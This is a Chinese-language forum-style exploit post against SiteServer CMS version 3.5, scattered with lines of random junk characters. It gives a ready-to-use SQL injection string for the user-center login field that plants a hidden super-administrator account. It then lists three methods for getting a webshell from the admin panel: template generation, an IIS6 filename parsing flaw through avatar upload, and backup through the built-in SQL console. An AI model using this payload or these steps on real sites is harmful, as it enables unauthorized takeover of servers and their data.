经测试秒杀最新的3.5版
& H' _! H% O( x: t8 x' M& @: O% A) K# I
stieserver官网:www.siteserver.cn4 U4 e7 h: n4 P, x% X. x8 ~! P
& z3 f5 o6 `4 c+ { o5 M 9 h* }7 @& p( B# x+ B ]/ g9 N9 ]
$ y1 f' F4 q1 J" F$ `% kEXP:' t1 r8 b% T( I7 n7 l) \
# I( O+ k4 k4 ?8 C# X b0 [
直接访问UserCenter/login.aspx
% A6 A0 h& G$ I0 S% N2 }* z$ a+ u- Z9 X* Y# z% H
1 S+ [$ O% u8 C
& ]; c% R, K3 _8 z, d( ~- p3 v用户名处输入:8 x2 j. M% A* x4 m) R
" ?4 L5 ^$ @3 A; N123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
0 l% \ l$ b$ y
- l+ V: J. f v ! T6 y5 n0 o% A! n+ [; @, A
+ G G3 G8 l e& ?$ c" j3 ^' k# r
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
7 @7 V3 Z* a4 B7 X( x
' C2 r* t7 d, v, j/ X! J
$ L9 C6 j- v' T0 z0 E8 u% Y9 i7 _
之后再访问后台SiteServer/login.aspx用插入的用户登陆 A9 [: }! I- B$ ^( j0 w+ b
2 ]( L* n j8 H E% f7 V( T " r: u- S% J0 B) ^- d" |
. t% }' A8 V2 `; z' ~- h1 M后台拿webshell的三种方法:- p( a5 ]* g1 {$ B! F
* ?) x0 H2 ]0 Z2 _+ h7 ~ x
一、
! A7 K6 V% l1 @0 P. y
2 {1 S2 d2 X$ P/ c6 q% Y站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx3 B. P- K& E8 [4 | Z/ L* l
5 w* Y% B$ ~3 }" g. b, r
二、$ {: S4 L2 y2 r( H1 D
8 _, e+ g! [. J成员权限-》添加用户-》用户名为:1.asp
% H* `4 P1 {% x, s1 A2 B
/ x, D& k3 ~% [' Jhttp://127.0.0.1/usercenter/6 N9 z% Z" q+ U+ c& M* r! L
% L% S+ L" U0 R; j5 j. Y) J1 J
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
6 m; T# u) Z& N0 x: p0 S7 e# H- W6 g7 \
(ps:后台添加用户时不会验证是否含有非法字符)* _; f. ]1 C) y) d: v
- t1 M& K0 }' b5 u三、& k. O+ A+ {' x, y( S
8 d. S2 U9 A, ? K- ?: ?
系统工具-》实用工具-》机器参数查看; I+ q* _5 {/ J/ R
可以看到数据库类型、名称,WEB路径
4 ?( G/ p, l! D1 v5 {8 f9 P# o, u$ M7 |
系统工具-》数据库工具-》SQL语句查询
+ t8 x! ^1 N' g" c这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
& \8 m: I3 J8 c- A, p( ], S, V4 C/ J4 H; \
|